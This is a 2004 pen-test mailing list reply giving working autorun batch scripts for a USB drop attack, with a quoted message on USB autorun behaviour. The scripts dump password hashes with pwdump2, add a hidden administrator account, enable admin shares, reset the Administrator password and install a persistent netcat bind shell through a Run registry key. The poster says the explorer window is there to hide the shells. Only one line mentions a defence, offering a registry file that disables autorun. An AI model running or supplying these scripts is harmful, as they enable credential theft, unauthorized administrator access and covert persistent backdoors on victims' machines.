Re: USB delivered attacks (working example)

[<mak_pen () hotmail com>]

In-Reply-To: <BAY15-F11d7KKQpQq5p00043ca6 () hotmail com>

I have been using this "attack" for some time now. below are the batch files (test.bat, b.bat and autorun.inf. 
autorun.inf calls test.bat)i use:

*********<BOF test.bat>
@echo off
@start /min b.bat /B
@exit
<EOF test.bat>


*********<BOF b.bat>
@explorer .
@echo off

::Displaying Computer Information for my reference
@echo %computername% %username% %date% %time% >> Essential\DumpIt\sam.txt
@Essential\DumpIt\pwdump2 >> Essential\DumpIt\sam.txt

::Adding a user for me :o)
@net user /add __system32__ .z,xmcnvb /fullname:"IPC User" 
@net localgroup Administrators _system32_ /add

::Hide the Account from being shown on the welcome screen
@reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v 
"__system__" /t REG_DWORD /d 0 /f

::Enabling Admin Shares
@reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters /v @AutoSharewks /t reg_dword /d 
1 /f

::Changing Admin Password
@net user administrator .;[pl,mkoijnbhu

::Backdooring
@copy nc.exe <nc directory>
@cd c:
@cd <nc directory>
@reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Taskbr" /d "nc directory\nc.exe -L -d -p 
80 -e cmd.exe" /f

@echo MYUSER: __system32__ .z,xmcnvb >> Essential\DumpIt\sam.txt
@echo Changed Admin Pass: .;[pl,mkoijnbhu >> Essential\DumpIt\sam.txt
@echo ******************************************** >> Essential\DumpIt\sam.txt
@cls
@exit
<EOF b.bat>

I have tried this using a flash memmory  and it works. what happens is that it opens explorer showing the current 
directory so that it hides any shells that might appear, then it does a series of commands which i have documented 
above.

to prevent against this i have a registry file i use to disable autorun all together. contact me if you need it at: 
mak_pen(at)hotmail(dot)com

Cheers....


> Received: (qmail 20035 invoked from network); 2 Jun 2004 22:23:41 -0000
> Received: from outgoing.securityfocus.com (HELO outgoing2.securityfocus.com) (205.206.231.26)
>  by mail.securityfocus.com with SMTP; 2 Jun 2004 22:23:41 -0000
> Received: from lists.securityfocus.com (lists.securityfocus.com [205.206.231.19])
>       by outgoing2.securityfocus.com (Postfix) with QMQP
>       id 62E8414370A; Thu,  3 Jun 2004 00:26:35 -0600 (MDT)
> Mailing-List: contact pen-test-help () securityfocus com; run by ezmlm
> Precedence: bulk
> List-Id: <pen-test.list-id.securityfocus.com>
> List-Post: <mailto:pen-test () securityfocus com>
> List-Help: <mailto:pen-test-help () securityfocus com>
> List-Unsubscribe: <mailto:pen-test-unsubscribe () securityfocus com>
> List-Subscribe: <mailto:pen-test-subscribe () securityfocus com>
> Delivered-To: mailing list pen-test () securityfocus com
> Delivered-To: moderator for pen-test () securityfocus com
> Received: (qmail 27926 invoked from network); 2 Jun 2004 19:49:38 -0000
> X-Originating-IP: [66.130.148.65]
> X-Originating-Email: [mindedsmasher () hotmail com]
> X-Sender: mindedsmasher () hotmail com
> From: "Fred Gravel" <mindedsmasher () hotmail com>
> To: pen-test () securityfocus com
> Subject: Re: USB delivered attacks
> Date: Wed, 02 Jun 2004 20:02:14 +0000
> Mime-Version: 1.0
> Content-Type: text/plain; format=flowed
> Message-ID: <BAY15-F11d7KKQpQq5p00043ca6 () hotmail com>
> X-OriginalArrivalTime: 02 Jun 2004 20:02:14.0500 (UTC) FILETIME=[7FA8F240:01C448DC]
>
> And after some search ... autorun is possible on a usb storage device... as 
> it explained just below ...
>
> http://www.microsoft.com/whdc/device/storage/usbfaq.mspx
> Q: What must I do to trigger Autorun on my USB storage device?
> If you need to make a USB storage device that executes Autorun, the 
> following two conditions must both be true:
> ?
>
> Media must be marked as removable.
> ?
>
> The device can be set to either static or removable.
>
> We associate the "removable" nature of a device with the bus that it resides 
> on. This means that a disk on an Integrated Device Electronics (IDE) or SCSI 
> bus would be considered fixed, whereas a disk on a USB or IEEE 1394 bus 
> would be regarded as removable by default. PnP uses a bit in the 
> DEVICE_CAPABILITIES structure to determine this. For more information, see 
> the DEVICE_CAPABILITIES Plug and Play Structure in the Windows DDK, located 
> at 
> http://msdn.microsoft.com/library/default.asp?url=/library/en-us/kmarch/hh/kmarch/k112_22r6.asp.
>
> The "removable" nature of media is a property of the device. For example, in 
> the case of a CD-ROM or a ZIP drive, the medium can be removed without the 
> device itself going away, but on the other hand the medium and the disk 
> cannot be separated on static storage PC cards. We obtain this information 
> by using the StorageDeviceProperty request. For more information, see the 
> STORAGE_DEVICE_DESCRIPTOR Storage Structure in the Windows DDK, located at 
> http://msdn.microsoft.com/library/en-us/storage/hh/storage/k306_00qa.asp.
>
>
> ----
> Also the autorun could be used in "cooperation" of the desktop.ini file 
> included in the folder(s) on the usb storage device if needed...
>
> _________________________________________________________________
> MSN Toolbar provides one-click access to Hotmail from any Web page ? FREE 
> download! http://toolbar.msn.click-url.com/go/onm00200413ave/direct/01/